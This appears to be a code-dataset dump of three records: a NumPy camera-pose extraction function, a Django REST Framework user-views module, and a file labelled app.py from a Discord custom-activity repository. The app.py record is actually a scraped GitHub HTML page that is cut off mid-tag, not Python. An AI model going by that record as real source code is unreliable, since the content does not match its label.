Python
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
akathpal/UMD-CMSC733-ComputerVision
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
[ "MIT" ]
1
2022-03-30T05:03:10.000Z
2022-03-30T05:03:10.000Z
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
akathpal/UMD-CMSC733-ComputerVision
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
[ "MIT" ]
null
null
null
SfM/Traditional/ExtraCredit/ExtractCameraPose.py
akathpal/UMD-CMSC733-ComputerVision
f5fa21a0ada8ab8ea08a6c558f6df9676570a2df
[ "MIT" ]
1
2022-03-30T05:03:09.000Z
2022-03-30T05:03:09.000Z
import numpy as np import sys sys.dont_write_bytecode = True def ExtractCameraPose(E, K): U, S, V_T = np.linalg.svd(E) W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]]) # print("E svd U", U) # print("E svd S", S) # print("E svd U[:, 2]", U[:, 2]) R = [] C = [] R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) C.append(U[:, 2]) C.append(-U[:, 2]) C.append(U[:, 2]) C.append(-U[:, 2]) for i in range(4): if (np.linalg.det(R[i]) < 0): R[i] = -R[i] C[i] = -C[i] return R, C
21.774194
52
0.463704
import numpy as np import sys sys.dont_write_bytecode = True def ExtractCameraPose(E, K): U, S, V_T = np.linalg.svd(E) W = np.array([[0, -1, 0], [1, 0, 0], [0, 0, 1]]) R = [] C = [] R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) R.append(np.dot(U, np.dot(W.T, V_T))) C.append(U[:, 2]) C.append(-U[:, 2]) C.append(U[:, 2]) C.append(-U[:, 2]) for i in range(4): if (np.linalg.det(R[i]) < 0): R[i] = -R[i] C[i] = -C[i] return R, C
true
true
f705b953a933a6e69681d0fcfe62b07584f75861
1,058
py
Python
app/user/views.py
frankRose1/recipe-app-api
0fff174ecb59bb06e6b631a33e34984e2f12f68a
[ "MIT" ]
null
null
null
app/user/views.py
frankRose1/recipe-app-api
0fff174ecb59bb06e6b631a33e34984e2f12f68a
[ "MIT" ]
null
null
null
app/user/views.py
frankRose1/recipe-app-api
0fff174ecb59bb06e6b631a33e34984e2f12f68a
[ "MIT" ]
null
null
null
from rest_framework import generics, authentication, permissions from rest_framework.authtoken.views import ObtainAuthToken from rest_framework.settings import api_settings from user.serializers import UserSerializer, AuthTokenSerializer class CreateUserView(generics.CreateAPIView): """Create a new user in the system""" serializer_class = UserSerializer class CreateTokenView(ObtainAuthToken): """Create a new token for a user""" serializer_class = AuthTokenSerializer renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES class ManageUserView(generics.RetrieveUpdateAPIView): """Manage the authenticated user""" serializer_class = UserSerializer authentication_classes = (authentication.TokenAuthentication,) permission_classes = (permissions.IsAuthenticated,) def get_object(self): """Retrieve and return authenticated user""" # authentication_classes would have populated the request with the # authenticated user if they provided a valid token return self.request.user
35.266667
74
0.780718
from rest_framework import generics, authentication, permissions from rest_framework.authtoken.views import ObtainAuthToken from rest_framework.settings import api_settings from user.serializers import UserSerializer, AuthTokenSerializer class CreateUserView(generics.CreateAPIView): serializer_class = UserSerializer class CreateTokenView(ObtainAuthToken): serializer_class = AuthTokenSerializer renderer_classes = api_settings.DEFAULT_RENDERER_CLASSES class ManageUserView(generics.RetrieveUpdateAPIView): serializer_class = UserSerializer authentication_classes = (authentication.TokenAuthentication,) permission_classes = (permissions.IsAuthenticated,) def get_object(self): return self.request.user
true
true
f705b9da707722b21ab2a995b261c27870b2cf77
177,225
py
Python
app.py
Bomzz06/FDiscordA
e0be0bed91f843be1ab42564c8a774839ccaace0
[ "MIT" ]
null
null
null
app.py
Bomzz06/FDiscordA
e0be0bed91f843be1ab42564c8a774839ccaace0
[ "MIT" ]
null
null
null
app.py
Bomzz06/FDiscordA
e0be0bed91f843be1ab42564c8a774839ccaace0
[ "MIT" ]
null
null
null
<!DOCTYPE html> <html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" integrity="sha512-d4XC7S3D2O/G0TvZjbbtWpDgCLyqvsXCX4K0DUJVfSwpV8ySOlchU43C/9mcyyHtCnczq4eoCl/e3fzC9uXxGA==" rel="stylesheet" href="https://github.githubassets.com/assets/light-7785c2ed2dc3d8efc6d13bd98db6ed5a.css" /><link crossorigin="anonymous" media="all" integrity="sha512-uEgC6AoKK1gK/XX3HlE4+2pdmfa3CUGgk9GV+7h+h0dtALsvueFLg+18JnwLD1axmkp744IzWjFcfHZTxmQyMQ==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-b84802e80a0a2b580afd75f71e5138fb.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-KQFKp2zcS4QM9du72skcYxPfuDslYljsOd9hsZFHSQl7WnkzjR0KkkuMbY7KFRWTerb8KbAYy11eD2ZoFgVyJg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-29014aa76cdc4b840cf5dbbbdac91c63.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-Bldh8KfOmuQXEarLeCx5IxrQms1DznU4qGbQ6oCrAVNdd4jea40lyBHdddi7o1P4dhler91XHyO9+iBe7m6LzQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-065761f0a7ce9ae41711aacb782c7923.css" /><link data-color-theme="dark_protanopia" crossorigin="anonymous" media="all" integrity="sha512-ZTzLkJDxM5xDVGmjIyBfQBPzZ+qCtysiTQmLxFsZvozwCNcG4TgwuGWvSbKXxIGfD7rWNUt9kSyUyLxK1kMqhg==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_protanopia-653ccb9090f1339c435469a323205f40.css" /><link data-color-theme="light_protanopia" crossorigin="anonymous" media="all" integrity="sha512-S9e8SuxweN/gYIfZR+mVTRvfJGkdNlTmZzokT1GZ9KoGEcUjgtWlvihTLVoG3E9gssDhT62eoq6UEeOFjFuvFA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/light_protanopia-4bd7bc4aec7078dfe06087d947e9954d.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-+nVL2XvNtwumIdq12YtvhclBiE72DgFQr/ItWzUHymt6x2tCbYBg0DaLOy39bB+N4wmwNqQene1NORzhgfi/wQ==" rel="stylesheet" href="https://github.githubassets.com/assets/frameworks-fa754bd97bcdb70ba621dab5d98b6f85.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-JhKolDx/FhHovKZsCFmQ2LKJwlyGRltUUDphBvVeSkv0Kl1vV4DpSpGXILf+CtiHubmHnqCOaBYpKb/rDjdAhQ==" rel="stylesheet" href="https://github.githubassets.com/assets/behaviors-2612a8943c7f1611e8bca66c085990d8.css" /> <link crossorigin="anonymous" media="all" integrity="sha512-/VP86KJoXAL8SaRo4I/QwqdgNg6xpeeb3JQ3gBKRLW76BBnBz3KCWJIKybR8px9wNNB6ixlzxDPAjkOSmRHODA==" rel="stylesheet" href="https://github.githubassets.com/assets/github-fd53fce8a2685c02fc49a468e08fd0c2.css" /> <script crossorigin="anonymous" defer="defer" integrity="sha512-bd5GjqJFbZLxlG4FXlu80JVzUSEHzxtnyyS98c3BaPbl32yravYkO9dNLUeI5QOm1XU7zIzJ0J5HOEQSfkgJOA==" type="application/javascript" src="https://github.githubassets.com/assets/environment-6dde468e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-c7dOB6hGd6OdYvUCrqXG0876tW5VQnJrRaBTz6kBjLZcGw2tKiXHfzDEiX5WEo1dseR2ilkdJPiZe1u0FrVhkg==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-frameworks-73b74e07.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-HKLxo1SCuvyND9pKagScspQtPtfYM442e7MMfig1ctv3M4xldrFt9nTLKE+KSshAfgn9839j9+BZPEeeUjJjKQ==" type="application/javascript" src="https://github.githubassets.com/assets/chunk-vendor-1ca2f1a3.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-EaSGeSQFfxLpe/avYyWp+85njCuoiL1FSklaKpZW18T+zwAl6eUjL/gMoISAY62x7+aNOtNG9V7awsMzgkgiJw==" type="application/javascript" src="https://github.githubassets.com/assets/behaviors-11a48679.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-Fv0IGb7X6YOQOp7bIjfuvISOJJCEsBWtmrn3neVFkckbHHt4pT0+T0nDl2mwVb1RCWVvS1DcZstOPl+SRFb0oA==" type="application/javascript" data-module-id="./chunk-advanced.js" data-src="https://github.githubassets.com/assets/chunk-advanced-16fd0819.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-5tWKSr7mhAzSh4Sx5YRFgKftdGxKwHKnOGYw5DlxjHhkQVURYFU3Bk5IMOGMKuAiJTlC3OXYM3xzGcyjzuEFQQ==" type="application/javascript" data-module-id="./chunk-animate-on-scroll.js" data-src="https://github.githubassets.com/assets/chunk-animate-on-scroll-e6d58a4a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-KT8PJraOSW8f9HMDRcjmyilvPC/PVT3Pd9NpBA036w4RRzXaJGd/cSB8JxswenJDhSAPuydYcePTx8wWv/5CQw==" type="application/javascript" data-module-id="./chunk-codemirror.js" data-src="https://github.githubassets.com/assets/chunk-codemirror-293f0f26.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ol5y71RI6PxIzSuxVDnwevlSWZzk4bNc3O/EjhN5zfx6VPqcyDOAiN9CoTydwOZwe2K3Jmu+85/EV19h4A13Uw==" type="application/javascript" data-module-id="./chunk-color-modes.js" data-src="https://github.githubassets.com/assets/chunk-color-modes-a25e72ef.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-DbpM4Xk+KtL8iCOI+ZACZGMdHN+r6aXCD2Wibv0FOD6mvDnGinYFYfj0BcPOrN5Ku2lJuhXylCh2wNDCLPBBeQ==" type="application/javascript" data-module-id="./chunk-confetti.js" data-src="https://github.githubassets.com/assets/chunk-confetti-0dba4ce1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-xrMxZfj62OcLN3FgzDtzy+P688RoxGL3nmdd2r4qJEjQZq5ZkqBwD6WiRoV4Mhnds8Y7JQebMbRCTITdFlZytg==" type="application/javascript" data-module-id="./chunk-contributions-spider-graph.js" data-src="https://github.githubassets.com/assets/chunk-contributions-spider-graph-c6b33165.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-vpt2Tdt20tOKRtrRWtOVaRi2wBoAaflNGUR6xuQgU/0Ywfxvbazq0C2hhKwuiC8b6A813gXGm+8fj0NCEosbYQ==" type="application/javascript" data-module-id="./chunk-copy.js" data-src="https://github.githubassets.com/assets/chunk-copy-be9b764d.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-arflMFcVzVAYaP2n7m7gklPChWsVsCDtRPav2Cb6bqLeJf8pgbojWJ3EseKXILCIqfxl/v6arBduZ9SLmpMEZw==" type="application/javascript" data-module-id="./chunk-delayed-loading-element.js" data-src="https://github.githubassets.com/assets/chunk-delayed-loading-element-6ab7e530.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-6j/oSF+kbW+yetNPvI684VzAu9pzug6Vj2h+3u1LdCuRhR4jnuiHZfeQKls3nxcT/S3H+oIt7FtigE/aeoj+gg==" type="application/javascript" data-module-id="./chunk-drag-drop.js" data-src="https://github.githubassets.com/assets/chunk-drag-drop-ea3fe848.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VSSd+Yzi2iMS+pibY6hD/WdypxAEdob5F2RMKxuKcAHS2EpFYJPeTXoVxt0NXg03tfj2dka2mEtHS+vjpYSaDw==" type="application/javascript" data-module-id="./chunk-edit-hook-secret-element.js" data-src="https://github.githubassets.com/assets/chunk-edit-hook-secret-element-55249df9.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ErqZFlIt7zIbLoZHvwfq9Zjo5zo+Y1A410nePDGvK+WVTVP10iNTfoqdOOSZNSy1gtLKIWDIIiOV30lr6zUJCA==" type="application/javascript" data-module-id="./chunk-edit.js" data-src="https://github.githubassets.com/assets/chunk-edit-12ba9916.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-aiqMIGGZGo8AQMjcoImKPMTsZVVRl6htCSY7BpRmpGPG/AF+Wq+P/Oj/dthWQOIk9cCNMPEas7O2zAR6oqn0tA==" type="application/javascript" data-module-id="./chunk-emoji-picker-element.js" data-src="https://github.githubassets.com/assets/chunk-emoji-picker-element-6a2a8c20.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-grRajv+ZiHV6dOdj1ZVsPoGYLqUr9lblDxPEuf6Fo3/GNfqIwV0NUvqiq05w68106TDk/g3iUkpOjDEpiEepuA==" type="application/javascript" data-module-id="./chunk-failbot.js" data-src="https://github.githubassets.com/assets/chunk-failbot-82b45a8e.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3jmKS/bkQpYNk9QJJ6D0y6iGTh7Lu2UVD/QLZZqutFE7e3IXxhEbQX0GXbl0PQWZ6whWKViOT3pOf/5zcaCXcA==" type="application/javascript" data-module-id="./chunk-feature-callout-element.js" data-src="https://github.githubassets.com/assets/chunk-feature-callout-element-de398a4b.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OszE/6GlmrYt3ALid4xVFd3/4d9cUH08ndFsO7vs/RHCz2bJ8+UsbjBc8wf09hyCOe9PuEgW0HDWpD32xMio2Q==" type="application/javascript" data-module-id="./chunk-filter-input.js" data-src="https://github.githubassets.com/assets/chunk-filter-input-3accc4ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-BV7wU3kptBGiv52rPu5ez9Fp8hDs9NxIm75USxtiip+HjDhStyYpG7hQMatWFmoYcumArHN0IAbC0b8XJfg+Hw==" type="application/javascript" data-module-id="./chunk-get-repo-element.js" data-src="https://github.githubassets.com/assets/chunk-get-repo-element-055ef053.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-JuwLQc/GiXiL3aQZ3y52X1UWniOU21IfTqzwnrfsFgxCwwhPUgh7KcIHb2oTxGC+yi7k5KN1mGVRifLWQMcfVw==" type="application/javascript" data-module-id="./chunk-insights-query.js" data-src="https://github.githubassets.com/assets/chunk-insights-query-26ec0b41.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4Wq8F/+bu5aXHG0CFx4Z1Whiip3tIAR70gvZgZtx8HiTLyBdzEUSSA9Soe3c67SUGuiJQB834x/1sse1bxBmeg==" type="application/javascript" data-module-id="./chunk-invitations.js" data-src="https://github.githubassets.com/assets/chunk-invitations-e16abc17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-AifR/xlMdAmSB9UcJEPQ16P863/ZqDphDeGKBZSPuSgsNaaehDErJfLCn1saUs0o0fAuM0jr+Sxr4HtQp7qpBA==" type="application/javascript" data-module-id="./chunk-jump-to.js" data-src="https://github.githubassets.com/assets/chunk-jump-to-0227d1ff.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-G/DI+JNZR6uAoSYxBCT6GSHHvZgBBCF1S40IIX/C797hFmg10tGcnlCbv3AzbBsPRPfQlh0GKZv5019fihsLow==" type="application/javascript" data-module-id="./chunk-keyboard-shortcuts-helper.js" data-src="https://github.githubassets.com/assets/chunk-keyboard-shortcuts-helper-1bf0c8f8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-3q9CgTtVlQ6fkBQRgpwkwOZ+3tHjtGqOJeAI+Vp4bbcig2h1mR9iRJG2ohClN8+YThWAOBxizc8R/yrZPbxNSw==" type="application/javascript" data-module-id="./chunk-launch-code-element.js" data-src="https://github.githubassets.com/assets/chunk-launch-code-element-deaf4281.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-m2VwI1wpMT5jpAzQLL7sVG0WkxzNAiBXeitEnh0A2tUHb+r4sVRzoR8PAyf0+zUkEDO5Ne5DBWO7gM2FtdT7cw==" type="application/javascript" data-module-id="./chunk-line-chart.js" data-src="https://github.githubassets.com/assets/chunk-line-chart-9b657023.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7G7VNhRoIxfK6aKTgUSUtMHI6U0k+szgDfwZIEcKuQKs+K0XZGfVivusB0NlOy78zixfFSI7NHzmvHike+5uyQ==" type="application/javascript" data-module-id="./chunk-metric-selection-element.js" data-src="https://github.githubassets.com/assets/chunk-metric-selection-element-ec6ed536.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7hZ031ngiF36wGsfcoyyCWTqwYxjX+qeTLtCV7CJ+IO+wzkzCm1RoR3WzWczfWmwLNqr+Hu3kQOgkBaGn4ntWQ==" type="application/javascript" data-module-id="./chunk-notification-list-focus.js" data-src="https://github.githubassets.com/assets/chunk-notification-list-focus-ee1674df.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ow4QYm35S5iR6nm/e/tx16lHUTK8pg1Ke1asLBVj6HzevTuo7S0GcL+7sWjvKOBvrVLgbwyPzfth75Vs6L3ePQ==" type="application/javascript" data-module-id="./chunk-premium-runners.js" data-src="https://github.githubassets.com/assets/chunk-premium-runners-a30e1062.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wXlv/QM4OsXYyUuSfFjx3XqSmvfLqtjvBx6wFlGNmHzd6Dkmr1HkTZs1qpCYTCjiyw1zm5ORa4O4gWAKc+cKPw==" type="application/javascript" data-module-id="./chunk-presence-avatars.js" data-src="https://github.githubassets.com/assets/chunk-presence-avatars-c1796ffd.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4O3AMK3FmKoTDmbBwFGIg+rNW3s73lJFQNLSBF1bczsjNsi8zT2t54vTwY1cMG1dox6Nt11wRGhevi1wxOFhWw==" type="application/javascript" data-module-id="./chunk-profile-pins-element.js" data-src="https://github.githubassets.com/assets/chunk-profile-pins-element-e0edc030.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hgoSKLTlL8I3IWr/TLONCU+N4kdCtdrHCrrud4NKhgRlLrTw0XUPhqBaDdZUiFSzDQRw/nFQ1kw2VeTm0g9+lA==" type="application/javascript" data-module-id="./chunk-profile.js" data-src="https://github.githubassets.com/assets/chunk-profile-860a1228.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-7KSTAXtI9DmFWoq8LjFSgxvvQZBoKHjyN5ZBzEWZ39P/CSWrQf/VaVKd0zpkd8vDk7mq7bcDSniipoFbjTABUA==" type="application/javascript" data-module-id="./chunk-pulse-authors-graph-element.js" data-src="https://github.githubassets.com/assets/chunk-pulse-authors-graph-element-eca49301.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-nOP8bLqNZgktv1/5mFrm9LhZDgozlsEbAj/XuQ35rxK/NNbqAmBDfeXQ+pkY5SXDd/8Bz/+RGfwr3FHL2sopSQ==" type="application/javascript" data-module-id="./chunk-readme-toc-element.js" data-src="https://github.githubassets.com/assets/chunk-readme-toc-element-9ce3fc6c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-rhladi60G4WRCtFkJAErIB32DBQt6BIMuzFRR0wJ68nWcqex4+C5Xb62rsOSNdluP3kuaSyWT3GTLCDSLv5jIA==" type="application/javascript" data-module-id="./chunk-ref-selector.js" data-src="https://github.githubassets.com/assets/chunk-ref-selector-ae195a76.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OoQBKokKMwRbi8BnCiii19MhicXF30O4k4hG7Vjg4xOltzKOC3kmOT0ERg0JBHqWGfjuMRWhuGNEX2EKgxalUw==" type="application/javascript" data-module-id="./chunk-remote-clipboard-copy.js" data-src="https://github.githubassets.com/assets/chunk-remote-clipboard-copy-3a84012a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-9XDv6O7Jn1ObhwWefPuUA4owGMOkPsTnvIITKck1CaZH35Sad6L1gq+Vvw8TEeB+gYUgBxWdkl3LgXjVkpDWMQ==" type="application/javascript" data-module-id="./chunk-responsive-underlinenav.js" data-src="https://github.githubassets.com/assets/chunk-responsive-underlinenav-f570efe8.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-8EhI56c+WrEr07oNcFy+Q329w5+DQVhB2TO9e0bT/TxnooHtwze/OanZof/+zDJxW7RbYY2pzRVwLRvoJRHUrA==" type="application/javascript" data-module-id="./chunk-runner-groups.js" data-src="https://github.githubassets.com/assets/chunk-runner-groups-f04848e7.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fDNA1jZjxFyXNVY10A8BfaZE/vpXhcnOI23xRlVWDJwmLsDsGm+5fedVhSPI9xxWfAVd9x6dFgZ0wzJRhFo3Rw==" type="application/javascript" data-module-id="./chunk-series-table.js" data-src="https://github.githubassets.com/assets/chunk-series-table-7c3340d6.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-bjSP8StMagdENf3/Xy8fkbUePS7vNbw+2hpgg0tne7zm/eiz3b1mM0XthFTSfxhO9QHFD8wO/hOCcbnORvN3NA==" type="application/javascript" data-module-id="./chunk-severity-calculator-element.js" data-src="https://github.githubassets.com/assets/chunk-severity-calculator-element-6e348ff1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-SBHO7sHXCuNn05KXDWS2ESheFt4K2kHRApzXS5HnFzOcb3d1yP0l44PDzciQdCLs9Bqf5LT5TdSL9X1P3ELwUA==" type="application/javascript" data-module-id="./chunk-slug.js" data-src="https://github.githubassets.com/assets/chunk-slug-4811ceee.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-OhOqF8hc26oNrxmRDWKLI5q2fZ981+zlYQnP8NWdQdHVw4/PS458WilKGoU2xaMsoFD7VmzAv0/TEUDbrDLpNA==" type="application/javascript" data-module-id="./chunk-sortable-behavior.js" data-src="https://github.githubassets.com/assets/chunk-sortable-behavior-3a13aa17.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-4QXRinR8LP2zrjFze0MDwuRPeLAojLt0f8KEdUTJdb2YkYLLgYGqolD+6R7ZDq9Z4JN8R7W6l8Ol+Mq1K0o2hg==" type="application/javascript" data-module-id="./chunk-stacked-area-chart.js" data-src="https://github.githubassets.com/assets/chunk-stacked-area-chart-e105d18a.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-r43awUBZWgUCEeqtDxYagERDbdN40mKXncMXD3WOB/COTYK83O6LTdXAgSQqR8pzYLutqstdN/O69iL641ka9w==" type="application/javascript" data-module-id="./chunk-stacks-input-config-view.js" data-src="https://github.githubassets.com/assets/chunk-stacks-input-config-view-af8ddac1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-+ghwIHl4WoTIKefFnsS00RF8wYc+3MqK4eEh1Rst68581JyTbm7O1RxzJjjzlXscQC81/zl70xwhc+SjdReoIA==" type="application/javascript" data-module-id="./chunk-three.module.js" data-src="https://github.githubassets.com/assets/chunk-three.module-fa087020.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-THgJsKACwTri1ETwLTU7myuj4XY4Jp4ZNziTof0Fo6v0iOljLueWxBybgtoOk1xWxa51GupjBc+gOoPGj8TaZA==" type="application/javascript" data-module-id="./chunk-tip.js" data-src="https://github.githubassets.com/assets/chunk-tip-4c7809b0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-WK8VXw3lfUQ/VRW0zlgKPhcMUqH0uTnB/KzePUPdZhCm/HpxfXXHKTGvj5C0Oex7+zbIM2ECzULbtTCT4ug3yg==" type="application/javascript" data-module-id="./chunk-toast.js" data-src="https://github.githubassets.com/assets/chunk-toast-58af155f.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-ZunpwBOViRebn/36Tku+7ZX39dPhNTIyKl+mL5t3n4F9JrcHiwYJdApE8OWHcvkzmGuD0f/AlUwzPIrafMHMBw==" type="application/javascript" data-module-id="./chunk-tweetsodium.js" data-src="https://github.githubassets.com/assets/chunk-tweetsodium-66e9e9c0.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-fvcOOYapCxPkDRQWz2WQzrqL6rRhX88yHWF87fb9Xny2Fq4lri0ONaVFL7XDSTiTyu4OTp+8WoyfMVpgGUaaVg==" type="application/javascript" data-module-id="./chunk-unveil.js" data-src="https://github.githubassets.com/assets/chunk-unveil-7ef70e39.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-hXM+wbN4loHepYG9wciuBZIBbZKnyrj1fHNEc2U4FGp4ferKbr4SA/wGyOZUun/W+yw+aHi0R0ZQqgr0YBFhQQ==" type="application/javascript" data-module-id="./chunk-user-status-submit.js" data-src="https://github.githubassets.com/assets/chunk-user-status-submit-85733ec1.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-wQnjXBFgueIl3c4MJVGGbqMThHgUcsOVtWP3vsLqqjRdtPae9B/fXj91Ow2UyzOF3b28lFfDi3jCyrJ+0oc/5g==" type="application/javascript" data-module-id="./chunk-webgl-warp.js" data-src="https://github.githubassets.com/assets/chunk-webgl-warp-c109e35c.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-A4qmVMCzB5D2dyHe2jUKlYmeGBxzaGzo+me2FKfRqrKfvAFQqnb8lSH60xmtaAGbaJze3hBMBlA2IlCLCvFwLg==" type="application/javascript" src="https://github.githubassets.com/assets/repositories-038aa654.js"></script> <script crossorigin="anonymous" defer="defer" integrity="sha512-VkWgu6DTrdgalvai4dv3kFM+AW4sPKJ0HnXDkTR+ED2YuypnGKavD4cqmX0iwDu1nE46Iax70/mdH5hWKOjSGQ==" type="application/javascript" src="https://github.githubassets.com/assets/diffs-5645a0bb.js"></script> <meta name="viewport" content="width=device-width"> <title>discord-custom-activity/app.py at master · agambajwa/discord-custom-activity</title> <meta name="description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub."> <link rel="search" type="application/opensearchdescription+xml" href="/opensearch.xml" title="GitHub"> <link rel="fluid-icon" href="https://github.com/fluidicon.png" title="GitHub"> <meta property="fb:app_id" content="1401488693436528"> <meta name="apple-itunes-app" content="app-id=1477376905" /> <meta name="twitter:image:src" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta name="twitter:site" content="@github" /><meta name="twitter:card" content="summary_large_image" /><meta name="twitter:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta name="twitter:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <meta property="og:image" content="https://opengraph.githubassets.com/9406fb387f4cda6ec027dc5254604a347e68437b1b79b7a4e20ce47057c0766d/agambajwa/discord-custom-activity" /><meta property="og:image:alt" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /><meta property="og:image:width" content="1200" /><meta property="og:image:height" content="600" /><meta property="og:site_name" content="GitHub" /><meta property="og:type" content="object" /><meta property="og:title" content="discord-custom-activity/app.py at master · agambajwa/discord-custom-activity" /><meta property="og:url" content="https://github.com/agambajwa/discord-custom-activity" /><meta property="og:description" content="Custom Activity for users on Discord. Contribute to agambajwa/discord-custom-activity development by creating an account on GitHub." /> <link rel="assets" href="https://github.githubassets.com/"> <link rel="shared-web-socket" href="wss://alive.github.com/_sockets/u/91737103/ws?session=eyJ2IjoiVjMiLCJ1Ijo5MTczNzEwMywicyI6NzYxNzA1MDI2LCJjIjo0MTc3MzU0NDYyLCJ0IjoxNjMzMzQ2MTgxfQ==--39edc59650e83b8d21b49e80f0dc2c8d8b193b66b4ee07dbdcea646522e41c9a" data-refresh-url="/_alive" data-session-id="7f83f766808e89f2c7b35c4840e92fc948d791956ae5c8a102edd36d614a7dd3"> <link rel="shared-web-socket-src" href="/socket-worker-0af8a29d.js"> <link rel="sudo-modal" href="/sessions/sudo_modal"> <meta name="request-id" content="A49F:7859:D3968:14FACD:615AE285" data-pjax-transient="true" /><meta name="html-safe-nonce" content="820993e64658c9849c0e0da6552784777372f6b8c3b5cd1e47564c3857ce68f9" data-pjax-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6Imh0dHBzOi8vZ2l0aHViLmNvbS9hZ2FtYmFqd2EvZGlzY29yZC1jdXN0b20tYWN0aXZpdHkiLCJyZXF1ZXN0X2lkIjoiQTQ5Rjo3ODU5OkQzOTY4OjE0RkFDRDo2MTVBRTI4NSIsInZpc2l0b3JfaWQiOiI2NzQzMDk1MDUyODcxMjcyNDA5IiwicmVnaW9uX2VkZ2UiOiJzb3V0aGVhc3Rhc2lhIiwicmVnaW9uX3JlbmRlciI6ImlhZCJ9" data-pjax-transient="true" /><meta name="visitor-hmac" content="df6cd9ddda4db95524fb9c3c9cc17f8b88a8f25b230bc1e43f92b48812fa8bbd" data-pjax-transient="true" /> <meta name="hovercard-subject-tag" content="repository:298526344" data-pjax-transient> <meta name="github-keyboard-shortcuts" content="repository,source-code" data-pjax-transient="true" /> <meta name="selected-link" value="repo_source" data-pjax-transient> <meta name="google-site-verification" content="c1kuD-K2HIVF635lypcsWPoD4kilo5-jA_wBFyT4uMY"> <meta name="google-site-verification" 